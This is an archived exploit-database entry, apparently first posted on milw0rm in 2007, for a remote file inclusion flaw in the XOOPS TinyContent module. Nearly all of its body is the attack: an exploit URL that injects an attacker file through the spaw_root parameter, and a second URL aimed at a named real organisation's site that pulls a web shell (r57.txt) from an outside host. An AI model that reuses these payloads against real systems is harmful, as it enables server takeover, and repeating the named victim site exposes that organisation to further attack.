[] NeoSense

xoops module tinycontent 1.5 - Remote File Inclusion

Author: Sp[L]o1T
type: webapps
platform: php
port: 
date_added: 2007-06-11 
date_updated: 2016-10-05 
verified: 1 
codes: OSVDB-35383;CVE-2007-3237 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comxoops2-mod-tinycontent_1_5.zip

~~~~~~~~~~~~~~~~~~~~~~~
XOOPS Module TinyContent Remote File Inclusion
version: < 1.5
source: http://prdownloads.sourceforge.net/xoops/xoops2-mod-tinycontent_1_5.zip
~~~~~~~~~~~~~~~~~~~~~~
Discovered by Sp[L]o1T from hTTP://hacking.3Xforum.Ro
~~~~~~~~~~~~~~~~~~~~~~
BUG:
http://www.site.com/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=evilcode.txt?

Vuln site:
http://www.wiscpsa.org/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ekin0x.com/r57.txt?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Shoutz t0: all members of Hacking[dot]3xforum[dot]ro ,V1rg0 ,Str0ke
Contact: splo1t[at]yahoo[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# milw0rm.com [2007-06-12]